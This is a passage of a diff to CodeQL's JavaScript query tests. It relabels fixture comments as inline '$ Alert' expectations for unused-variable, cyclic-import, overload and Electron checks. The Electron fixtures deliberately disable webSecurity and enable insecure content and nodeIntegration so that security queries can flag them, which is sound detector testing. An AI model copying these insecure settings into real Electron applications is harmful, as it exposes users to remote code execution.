a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/UnreachableMethodOverloads.qlref @@ -1 +1,2 @@ -Declarations/UnreachableMethodOverloads.ql +query: Declarations/UnreachableMethodOverloads.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts index 9455c9a161b5..17d95f835cf7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts +++ b/javascript/ql/test/query-tests/Declarations/UnreachableOverloads/tst.ts @@ -1,30 +1,30 @@ declare class Foobar { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert types1(): T[] - types1(): any[] // NOT OK. + types1(): any[] // $ Alert types2(): any[] - types2(): T[] // OK! + types2(): T[] types3>(t: T): number; - types3(t: T): number // OK! + types3(t: T): number on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; - on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // NOT OK. + on(event: string, fn?: (event?: any, ...args: any[]) => void): Function; // $ Alert foo(this: string): string; - foo(this: number): number; // OK + foo(this: number): number; bar(this: number): string; - bar(this: number): number; // NOT OK + bar(this: number): number; // $ Alert } declare class Base { method(foo: number): string; - method(foo: number): number; // NOT OK. + method(foo: number): number; // $ Alert overRiddenInSub(): string; overRiddenInSub(): number; @@ -49,13 +49,13 @@ interface Base2 { method(): "bar"; } -// OK. + interface MultiInheritanceI extends Base1, Base2 { method(): "foo"; method(): "bar"; } -// OK. + declare class MultiInheritanceC implements Base1, Base2 { method(): "foo"; method(): "bar"; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts index 898b246fe9f3..6ad8967fbe1f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/A.ts @@ -1,3 +1,3 @@ import {B} from './B'; -export let A: number = B+1; // NOT OK: `B` is not initialized if `B.ts` is imported first. +export let A: number = B+1; // $ Alert - `B` is not initialized if `B.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts index f22945c1f986..92cc89638297 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/B.ts @@ -2,4 +2,4 @@ import {A} from './A'; export let B: number = 100; -export let Q: number = A; // NOT OK: `A` is not initialized if `A.ts` is imported first. +export let Q: number = A; // $ Alert - `A` is not initialized if `A.ts` is imported first. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js index bc215a3b6983..a7ec4ead8979 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/ExampleBad/services.js @@ -2,7 +2,7 @@ import { AudioService } from './audio' import { StoreService } from './store'; export const services = [ - AudioService, + AudioService, // $ Alert StoreService ]; diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref index f8f5f52dffc2..d77733eeada1 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/UnstableCyclicImport.qlref @@ -1 +1,2 @@ -Declarations/UnstableCyclicImport.ql +query: Declarations/UnstableCyclicImport.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts index fa3dfff4b500..3b9a180a68fa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/acyclicImport.ts @@ -1,3 +1,3 @@ import {B} from './B'; -console.log(B) // OK: `B` does not import this file +console.log(B) // OK - `B` does not import this file diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts index 7cd3d8dc021c..6a66f26422d6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleA.ts @@ -1,4 +1,4 @@ import {B} from './exportCycleB'; export var A = 100; -export {B}; // OK: export binding does not immediately evaluate 'B' +export {B}; // OK - export binding does not immediately evaluate 'B' diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts index 75c0593f980e..057e72352b77 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/exportCycleB.ts @@ -1,3 +1,3 @@ import {A} from './exportCycleA'; -export let B = () => A; // OK: `A` is not used during initialization. +export let B = () => A; // OK - `A` is not used during initialization. diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts index 2627fefa0e07..538e7fb44050 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeA.ts @@ -3,5 +3,5 @@ import {B} from './safeB'; export let A = 100; export function getSum() { - return A + B; // OK: not accessed from top-level + return A + B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts index 19d7c26d1bdf..dfc1d45417a4 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/safeB.ts @@ -3,5 +3,5 @@ import {A} from './safeA'; export let B = 20; export function getProduct() { - return A * B; // OK: not accessed from top-level + return A * B; // OK - not accessed from top-level } diff --git a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts index 178e2d04399e..fbb37b4b1ae6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts +++ b/javascript/ql/test/query-tests/Declarations/UnstableCyclicImport/typeA.ts @@ -4,4 +4,4 @@ export interface TypeA { field: TypeB } -export let valueA = valueB; // OK: these imports are not cyclic at runtime +export let valueA = valueB; // OK - these imports are not cyclic at runtime diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected @@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref index b04f67ab67e4..840ecd233e83 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.qlref @@ -1 +1,2 @@ -Declarations/UnusedParameter.ql +query: Declarations/UnusedParameter.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts index 1854dd539135..15bff6ed8921 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/istype.ts @@ -12,10 +12,10 @@ class SingletonTreeModel implements ITreeModel { isLeafNode(node: Node): node is LeafNode { return node instanceof LeafNode; } - isBranchNode(node: Node): node is BranchNode { // OK + isBranchNode(node: Node): node is BranchNode { return false; // This model has no branches. } - isValidNode(node: Node): boolean { // NOT OK + isValidNode(node: Node): boolean { // $ Alert return Node != null; // woops } } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts index fe32f6e80ea5..6ca356434eaf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/parameter_field.ts @@ -1,7 +1,7 @@ class C { - constructor(public x: number) {} // OK + constructor(public x: number) {} } class D { - constructor(x: number) {} // NOT OK + constructor(x: number) {} // $ Alert } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts index 264928281a32..84aff19d331a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/thisparameter.ts @@ -1,3 +1,3 @@ -function foo(this: void, x: number) { // OK: 'this' is not an ordinary parameter +function foo(this: void, x: number) { // OK - 'this' is not an ordinary parameter return x; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js index cb7a02387c21..7e367fc67dfa 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst.js @@ -1,28 +1,26 @@ -// OK + [1, , 3].forEach(function(elt, idx) { console.log(idx + " is not omitted."); }); -// NOT OK -[1, , 3].forEach(function(elt, idx) { +[1, , 3].forEach(function(elt, idx) { // $ Alert sum += elt; }); -// NOT OK -function f1(x, y) { +function f1(x, y) { // $ Alert return y; } f1(23, 42); -// OK + function f2(x, y) { return y; } [].map(f2); -// OK + function f3(x, y) { return y; } @@ -30,11 +28,11 @@ function f3(x, y) { var g = f3; [].map(g); -// OK + define(function (require, exports, module) { module.x = 23; }); -// OK: starts with underscore +// OK - starts with underscore function f(_p) { } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js index 7621dca4b0da..89e4ed305f36 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/tst2.js @@ -1,18 +1,18 @@ -function f(x, y) { // NOT OK +function f(x, y) { // $ Alert return y; } -function g(x, y) { // OK +function g(x, y) { return y + arguments[0]; } -function h(x) { // OK +function h(x) { function inner() { x = 1; } } -// OK + /** * @param {*} x the first argument, deliberately unused * @param {*} y the second argument @@ -21,16 +21,15 @@ function K(x, y) { return y; } -// NOT OK /** * @param {*} x the first argument * @param {*} y the second argument */ -function K(x, y) { +function K(x, y) { // $ Alert return y; } -// OK + /** * @abstract * @param {*} x the first argument diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref b/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref index 9583241c2f0d..0dca4ee68e4e 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/UnusedProperty.qlref @@ -1 +1,2 @@ -Declarations/UnusedProperty.ql +query: Declarations/UnusedProperty.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js index 847f30bd9443..d5e1525afac5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst.js @@ -1,7 +1,7 @@ (function(){ var captured1 = { used1: 42, - unused1: 42 + unused1: 42 // $ Alert }; captured1.used1; @@ -16,20 +16,20 @@ f(...{used6: 42}); [...{used7: 42}]; ({...{used8: 42}}); - ({ unused9: 42 }) + ""; + ({ unused9: 42 }) + ""; // $ Alert ({ used10: 42 }).hasOwnProperty; ({ used10: 42 }).propertyIsEnumerable; (function(){ var captured11 = { used11: 42, - unused11: 42 + unused11: 42 // $ Alert }; captured11.used11; var captured12 = { - used12_butNotReally: 42, - unused12: 42 + used12_butNotReally: 42, // $ Alert + unused12: 42 // $ Alert }; throw x; @@ -49,10 +49,10 @@ }); var captured14 = { - unused14: 42 + unused14: 42 // $ Alert }; - captured14.unused14 = 42; - captured14.unused14 = 42; + captured14.unused14 = 42; // $ Alert + captured14.unused14 = 42; // $ Alert var captured15 = { diff --git a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts index 7ad7c508df8d..7906faf06c98 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedProperty/tst2.ts @@ -21,7 +21,7 @@ class C { } (function(){ - var o1: any = { p: 42, q: 42 }; + var o1: any = { p: 42, q: 42 }; // $ Alert o1.q; var o2: any = { p: 42, q: 42 }; var o3: { p: int, q: int } = o2; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx index ac3df7f815ce..a8c86768ad1a 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/Babelrc/importPragma.jsx @@ -1,4 +1,4 @@ import { h } from 'preact'; // OK - JSX element uses 'h' after babel compilation -import { q } from 'preact'; // NOT OK - not used +import { q } from 'preact'; // $ Alert - not used export default (
    Hello
    ); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js index a77c7545deee..321a1df2f7b3 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedIndexVariable.js @@ -1,6 +1,6 @@ function sum(xs, i) { var res = 0; - for(;i++Hello); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts index 0fa2f18066c0..16e81a7f19de 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/importtype.ts @@ -1,10 +1,10 @@ -// OK: `SomeInterface` is used in an `implements` clause +// OK - `SomeInterface` is used in an `implements` clause import SomeInterface from 'somewhere'; class SomeClass implements SomeInterface { } new SomeClass(); -import SomethingElse from 'somewhere'; // OK: SomethingElse is used in a type +import SomethingElse from 'somewhere'; // OK - SomethingElse is used in a type type T = `Now for ${SomethingElse}`; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts index bdcd767fae80..c90e8f8abb80 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/interTypes.ts @@ -1,4 +1,4 @@ -import { Foo, Bar } from "somewhere"; // OK +import { Foo, Bar } from "somewhere"; // $ Alert type FooBar = T extends [infer S extends Foo, ...unknown[]] diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js index b32fa341a832..be4b41caefb9 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/multi-imports.js @@ -1,4 +1,4 @@ -import {a, b, c, d} from 'x'; -import {ordered, alphabetically} from 'x'; +import {a, b, c, d} from 'x'; // $ Alert +import {ordered, alphabetically} from 'x'; // $ Alert c(); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts index 8749b3b059e4..336c20798120 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/namespaceImportAsType.ts @@ -1,6 +1,6 @@ -import * as X from "x"; // OK -import * as Y from "y"; // OK -import * as Z from "z"; // NOT OK +import * as X from "x"; +import * as Y from "y"; +import * as Z from "z"; // $ Alert function f(x: X) {} function g(x: Y.T) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js index 70e8264f7050..5478d1d02da7 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/node.js @@ -1,2 +1,2 @@ -// OK + module.exports = class C {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js index ac9bf939e31e..8c43db101c4f 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/react-jsx.js @@ -1,2 +1,2 @@ -var React = x; // OK +var React = x; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js index a68c0456cdf8..f58715a8a9b0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-1.js @@ -1,2 +1,2 @@ -var React = require("probably-react"); // OK +var React = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js index 7137d8a44a9d..c6bcc81929e6 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-2.js @@ -1,2 +1,2 @@ -var { React } = { React: require("probably-react") }; // OK +var { React } = { React: require("probably-react") }; (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js index 580680cdb682..c40e6c565daf 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-3.js @@ -1,2 +1,2 @@ -var { React } = require("probably-react"); // OK +var { React } = require("probably-react"); (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js index 9ba55169e39d..11f6763cf3f5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/require-react-in-other-scope.js @@ -1,5 +1,5 @@ (function() { - var React = require("probably-react"); // NOT OK + var React = require("probably-react"); // $ Alert }) (function() { (); diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts index 07f817e287a8..5791afc6ed5c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/thisparam.ts @@ -1,4 +1,4 @@ -import { Foo, Bar, Baz } from "somewhere"; // OK +import { Foo, Bar, Baz } from "somewhere"; export function f(this: Foo) {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts index 8b157c18f8df..07c3bb0c50dc 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeInTemplateLiteralTag.ts @@ -1,6 +1,6 @@ -import { SomeInterface } from 'somwhere1'; // OK -import { AnotherInterface } from 'somwhere2'; // OK -import { foo } from 'somewhere3'; // OK +import { SomeInterface } from 'somwhere1'; +import { AnotherInterface } from 'somwhere2'; +import { foo } from 'somewhere3'; let x = "world"; diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts index 3a4c417daec3..5c5085a37285 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/typeoftype.ts @@ -1,12 +1,12 @@ -import fs = require('fs') // OK -import http = require('http') // OK +import fs = require('fs') +import http = require('http') export var mockFs : typeof fs = {} export var mockRequest : typeof http.ServerRequest = {} export function f() { - let x = 4 // OK - let y = 5 // NOT OK + let x = 4 + let y = 5 // $ Alert var t : typeof x = 20 return t } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts index 130a2a1db926..62a86545a4e0 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/types.d.ts @@ -1 +1 @@ -declare class UnusedClass {} // OK +declare class UnusedClass {} diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js index 75eade9c6f82..e25cb72b32a5 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/underscore.js @@ -1,10 +1,10 @@ function f(a) { - const [a, // OK: used - _, // OK: starts with underscore - _c, // OK: starts with underscore - d, // OK: used - e, // NOT OK - f] // NOT OK + const [a, // OK - used + _, // OK - starts with underscore + _c, // OK - starts with underscore + d, // OK - used + e, // $ Alert + f] // $ Alert = a; return a + d; } diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts index 14ec99e02b5c..a04efbed8e1c 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/unusedShadowed.ts @@ -1,6 +1,6 @@ -import T from 'somewhere'; // NOT OK: `T` is unused (it is shadowed by another T) -import object from 'somewhere'; // NOT OK: `object` is unused (it is "shadowed" by a keyword) -import * as N from 'somewhere'; // OK: N is a namespace and thus not shadowed by 'interface N'. +import T from 'somewhere'; // $ Alert - `T` is unused (it is shadowed by another T) +import object from 'somewhere'; // $ Alert - `object` is unused (it is "shadowed" by a keyword) +import * as N from 'somewhere'; // OK - N is a namespace and thus not shadowed by 'interface N'. { var x: T = {}; diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref index 35bbe5f2d4d1..2b32814badbe 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/AllowRunningInsecureContent.qlref @@ -1 +1,2 @@ -Electron/AllowRunningInsecureContent.ql \ No newline at end of file +query: Electron/AllowRunningInsecureContent.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js index 01828a0b9fd9..d1a878a6f846 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DangerousWebPreferences.js @@ -3,8 +3,8 @@ const {BrowserWindow} = require('electron') function test() { var unsafe_used = { webPreferences: { - webSecurity: false, - allowRunningInsecureContent: true, + webSecurity: false, // $ Alert[js/disabling-electron-websecurity] + allowRunningInsecureContent: true, // $ Alert[js/enabling-electron-insecure-content] experimentalFeatures: true, enableBlinkFeatures: ['ExecCommandInJavaScript'], blinkFeatures: 'CSSVariables' diff --git a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref index c2907c3bd577..7dcd5b81dbff 100644 --- a/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref +++ b/javascript/ql/test/query-tests/Electron/DangerousWebPreferencesSettings/DisablingWebSecurity.qlref @@ -1 +1,2 @@ -Electron/DisablingWebSecurity.ql \ No newline at end of file +query: Electron/DisablingWebSecurity.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..25500de34863 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected @@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // im ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js index 5e1d0e95fb43..e002845d7995 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.js @@ -1,32 +1,32 @@ const {BrowserWindow} = require('electron') function test() { - var unsafe_1 = { // NOT OK, both enabled + var unsafe_1 = { // both enabled webPreferences: { nodeIntegration: true, nodeIntegrationInWorker: true, plugins: true, webSecurity: true, sandbox: true - } + } // $ Alert }; - var options_1 = { // NOT OK, `nodeIntegrationInWorker` enabled + var options_1 = { // `nodeIntegrationInWorker` enabled webPreferences: { plugins: true, nodeIntegrationInWorker: false, webSecurity: true, sandbox: true - } + } // $ Alert }; - var pref = { // NOT OK, implicitly enabled + var pref = { // implicitly enabled plugins: true, webSecurity: true, sandbox: true - }; + }; // $ Alert - var options_2 = { // NOT OK, implicitly enabled + var options_2 = { webPreferences: pref, show: true, frame: true, @@ -34,7 +34,7 @@ function test() { minHeight: 300 }; - var safe_used = { // NOT OK, explicitly disabled + var safe_used = { // explicitly disabled webPreferences: { nodeIntegration: false, plugins: true, @@ -46,7 +46,7 @@ function test() { var w1 = new BrowserWindow(unsafe_1); var w2 = new BrowserWindow(options_1); var w3 = new BrowserWindow(safe_used); - var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // NOT OK, `nodeIntegration` enabled + var w4 = new BrowserWindow({width: 800, height: 600, webPreferences: {nodeIntegration: true}}); // $ Alert - `nodeIntegration` enabled var w5 = new BrowserWindow(options_2); var w6 = new BrowserWindow(safe_used); } diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref index b0315fd89ad5..d54f00166518 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.qlref +++ 